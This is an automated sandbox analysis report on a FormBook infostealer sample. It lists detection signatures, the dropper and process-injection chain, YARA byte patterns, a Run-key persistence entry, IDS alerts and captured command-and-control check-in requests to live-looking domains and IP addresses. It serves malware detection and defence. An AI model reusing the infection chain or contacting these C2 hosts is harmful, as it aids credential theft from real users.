
Windows Analysis Report
FS04dlvJrq.exe

Overview

General Information

Sample name: FS04dlvJrq.exe (renamed because original name is a hash value)
Original sample name: 16b2851cd765c313395a3cba2a38a16d4338ef32bb68e5c13320494b3c84c52a.exe
Analysis ID: 1550252
MD5: 15227b37f486cb74c7676395a12c9296
SHA1: aef022249d8320d02fc5917813df39ceb7f85205
SHA256: 16b2851cd765c313395a3cba2a38a16d4338ef32bb68e5c13320494b3c84c52a
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM autoit script
Yara detected Autoit Injector
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • FS04dlvJrq.exe (PID: 516 cmdline: "C:\Users\user\Desktop\FS04dlvJrq.exe" MD5: 15227B37F486CB74C7676395A12C9296)
    • wscript.exe (PID: 5764 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2436 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 3224 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
      • cmd.exe (PID: 6844 cmdline: "C:\Windows\System32\cmd.exe" /c bpqdpksed.icm vbepwhj.mp3 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bpqdpksed.icm (PID: 5156 cmdline: bpqdpksed.icm vbepwhj.mp3 MD5: 0ADB9B817F1DF7807576C2D7068DD931)
          • RegSvcs.exe (PID: 948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
            • rmfPfCOHcNt.exe (PID: 3084 cmdline: "C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • EhStorAuthn.exe (PID: 4052 cmdline: "C:\Windows\SysWOW64\EhStorAuthn.exe" MD5: 0C9245FDD67B14B9E7FBEBB88C3A5E7F)
                • rmfPfCOHcNt.exe (PID: 3268 cmdline: "C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • firefox.exe (PID: 3744 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • RegSvcs.exe (PID: 5932 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
            • WerFault.exe (PID: 6468 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cmd.exe (PID: 5112 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 5796 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x44e91:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x2cfc0:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f0a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x171d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
15.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
15.2.RegSvcs.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e2a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x163d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
15.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
15.2.RegSvcs.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f0a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x171d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 5764, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 2436, ProcessName: cmd.exe
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 5764, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 2436, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\FS04dlvJrq.exe", ParentImage: C:\Users\user\Desktop\FS04dlvJrq.exe, ParentProcessId: 516, ParentProcessName: FS04dlvJrq.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , ProcessId: 5764, ProcessName: wscript.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\FS04dlvJrq.exe", ParentImage: C:\Users\user\Desktop\FS04dlvJrq.exe, ParentProcessId: 516, ParentProcessName: FS04dlvJrq.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , ProcessId: 5764, ProcessName: wscript.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\FS04dlvJrq.exe", ParentImage: C:\Users\user\Desktop\FS04dlvJrq.exe, ParentProcessId: 516, ParentProcessName: FS04dlvJrq.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , ProcessId: 5764, ProcessName: wscript.exe
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: bpqdpksed.icm vbepwhj.mp3, CommandLine: bpqdpksed.icm vbepwhj.mp3, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm, NewProcessName: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm, OriginalFileName: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c bpqdpksed.icm vbepwhj.mp3, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6844, ParentProcessName: cmd.exe, ProcessCommandLine: bpqdpksed.icm vbepwhj.mp3, ProcessId: 5156, ProcessName: bpqdpksed.icm
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\FS04dlvJrq.exe", ParentImage: C:\Users\user\Desktop\FS04dlvJrq.exe, ParentProcessId: 516, ParentProcessName: FS04dlvJrq.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , ProcessId: 5764, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\uhex\BPQDPK~1.EXE C:\Users\user\AppData\Roaming\uhex\vbepwhj.mp3, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm, ProcessId: 5156, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-06T16:06:09.037540+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.6 | 49735 | TCP
2024-11-06T16:06:47.697936+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.6 | 49920 | TCP
2024-11-06T16:07:04.914090+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49982 | 216.40.34.41 | 80 | TCP
2024-11-06T16:07:28.309362+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49988 | 3.33.130.190 | 80 | TCP
2024-11-06T16:07:43.613704+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49992 | 192.197.113.67 | 80 | TCP
2024-11-06T16:07:57.981805+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49997 | 162.0.225.218 | 80 | TCP
2024-11-06T16:07:20.691584+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49985 | 3.33.130.190 | 80 | TCP
2024-11-06T16:07:23.239548+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49986 | 3.33.130.190 | 80 | TCP
2024-11-06T16:07:25.780692+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49987 | 3.33.130.190 | 80 | TCP
2024-11-06T16:07:35.957533+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49989 | 192.197.113.67 | 80 | TCP
2024-11-06T16:07:38.551301+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49990 | 192.197.113.67 | 80 | TCP
2024-11-06T16:07:41.229477+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49991 | 192.197.113.67 | 80 | TCP
2024-11-06T16:07:49.679877+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49994 | 162.0.225.218 | 80 | TCP
2024-11-06T16:07:52.263241+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49995 | 162.0.225.218 | 80 | TCP
2024-11-06T16:07:54.832066+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49996 | 162.0.225.218 | 80 | TCP


AV Detection

Source: FS04dlvJrq.exe; ReversingLabs: Detection: 47%
Source: Yara match; File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.3357840971.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.3355319843.00000000022E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.3355834381.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.3357716278.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.2647394884.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: FS04dlvJrq.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: FS04dlvJrq.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: FS04dlvJrq.exe
Source: Binary string: EhStorAuthn.pdbGCTL source: RegSvcs.exe, 0000000F.00000002.2646695656.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000015.00000002.3356279452.0000000000A38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rmfPfCOHcNt.exe, 00000015.00000002.3356947382.0000000000BBE000.00000002.00000001.01000000.0000000D.sdmp, rmfPfCOHcNt.exe, 00000017.00000000.2725761055.0000000000BBE000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000F.00000002.2646917691.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3358640633.00000000045A0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000003.2649299700.00000000043FA000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3358640633.000000000473E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000003.2646727901.0000000004249000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.2646917691.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, EhStorAuthn.exe, 00000016.00000002.3358640633.00000000045A0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000003.2649299700.00000000043FA000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3358640633.000000000473E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000003.2646727901.0000000004249000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: EhStorAuthn.pdb source: RegSvcs.exe, 0000000F.00000002.2646695656.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000015.00000002.3356279452.0000000000A38000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\FS04dlvJrq.exe; Code function: 0_2_00E6F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00E6F826
Source: C:\Users\user\Desktop\FS04dlvJrq.exe; Code function: 0_2_00E81630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00E81630
Source: C:\Users\user\Desktop\FS04dlvJrq.exe; Code function: 0_2_00E91FF8 FindFirstFileExA,0_2_00E91FF8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm; Code function: 8_2_00DCE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,8_2_00DCE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm; Code function: 8_2_00DCD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_00DCD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm; Code function: 8_2_00DCDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_00DCDB69
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm; Code function: 8_2_00DD9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00DD9F9F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm; Code function: 8_2_00DDA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00DDA0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm; Code function: 8_2_00DDA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,8_2_00DDA488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm; Code function: 8_2_00DD65F1 FindFirstFileW,FindNextFileW,FindClose,8_2_00DD65F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm; Code function: 8_2_00D9C642 FindFirstFileExW,8_2_00D9C642
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm; Code function: 8_2_00DD72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,8_2_00DD72E9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm; Code function: 8_2_00DD7248 FindFirstFileW,FindClose,8_2_00DD7248
Source: C:\Windows\SysWOW64\EhStorAuthn.exe; Code function: 22_2_022FC200 FindFirstFileW,FindNextFileW,FindClose,22_2_022FC200
Source: C:\Windows\SysWOW64\EhStorAuthn.exe; Code function: 4x nop then xor eax, eax 22_2_022E9A50
Source: C:\Windows\SysWOW64\EhStorAuthn.exe; Code function: 4x nop then mov ebx, 00000004h 22_2_043304DE

Networking

Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49982 -> 216.40.34.41:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 192.197.113.67:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 192.197.113.67:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49992 -> 192.197.113.67:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49997 -> 162.0.225.218:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49988 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 162.0.225.218:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 162.0.225.218:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 192.197.113.67:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 162.0.225.218:80
Source: Joe Sandbox View; IP Address: 3.33.130.190
Source: Joe Sandbox View; IP Address: 162.0.225.218
Source: Joe Sandbox View; ASN Name: HKKFGL-AS-APHKKwaifongGroupLimitedHK
Source: Joe Sandbox View; ASN Name: AMAZONEXPANSIONGB
Source: Joe Sandbox View; ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View; ASN Name: TUCOWSCA
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:49735
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:49920
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm; Code function: 8_2_00DDD7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,8_2_00DDD7A1
Source: global traffic; HTTP traffic detected:
  GET /r0a9/?8RN4oRq=ZYHb+yN+RN7ZtjbwI7SB23xqPJJsxDr8Rawhra04/gYnM82mZx5+8Ykp6tR7PNEw3bB584nn/0BLo1rj87ovLgV9i3rHjjPoDRBTQtWr7711poFsTmp7tSOMnBMqrIuiMn54qIs=&SBV8T=1lJpZfbXA4K HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Connection: close
  Host: www.integritywork.shop
  User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
Source: global traffic; HTTP traffic detected:
  GET /xqh1/?SBV8T=1lJpZfbXA4K&8RN4oRq=LdMJVAe8LjCJtA/hX/WGJbv1EGS8xWceFJt7j7SiEDgChmEUBLc4idOyKCr8dFmuKAy1MvAxa+k6cqr1XzKglkByqns40V6cXeBQfaQQ1061cjyky34X3yYouoYD43fZweF+tEU= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Connection: close
  Host: www.ontohealth.net
